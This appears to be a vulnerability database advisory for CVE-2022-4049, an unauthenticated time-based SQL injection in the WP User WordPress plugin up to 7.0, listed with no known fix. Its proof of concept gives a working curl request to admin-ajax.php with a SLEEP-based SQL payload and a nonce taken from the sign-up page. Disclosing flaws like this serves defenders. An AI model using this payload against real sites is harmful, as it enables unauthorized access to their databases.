WP User <= 7.0 – Unauthenticated SQLi | CVE 2022-4049 | Plugin Vulnerabilities

Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.

Proof of Concept

1. As an unauthenticated user, visit the "Sign Up" page (by default, this is /?page_id=5, or /user/)

2. Extract the "wpuser_update_setting" nonce (CTRL+F for "wpuser_update_setting")

3. Invoke the following curl command, with the just extracted nonce, to induce a 5 seconds sleep:

time curl https://example.com/wp-admin/admin-ajax.php \
    --data 'action=wpuser_group_action&group_action=x&wpuser_update_setting=<NONCE>&id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))khkM)'

Affects Plugins

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

9b0781e2-ad62-4308-bafc-d45b9a2472be

Timeline

Publicly Published

2022-12-09 (about 1 years ago)

Added

2022-12-09 (about 1 years ago)

Last Updated

2022-12-09 (about 1 years ago)

Other

Published

Title

Published

2014-08-01

Title

My Category Order <= 2.8 - SQL Injection

Published

2024-04-25

Title

WooCommerce Amazon Affiliates - Wordpress Plugin <= 14.0.10 - Authenticated (Subscriber+) SQL Injection

Published

2024-01-18

Title

Stripe Payment Plugin for WooCommerce < 3.8.0 - Unauthenticated SQL Injection

Published

2022-11-17

Title

Buddybadges <= 1.0.0 - Admin+ SQLi

Published

2020-04-29

Title

Learnpress < 3.2.6.8 - Authenticated Time Based Blind SQL Injection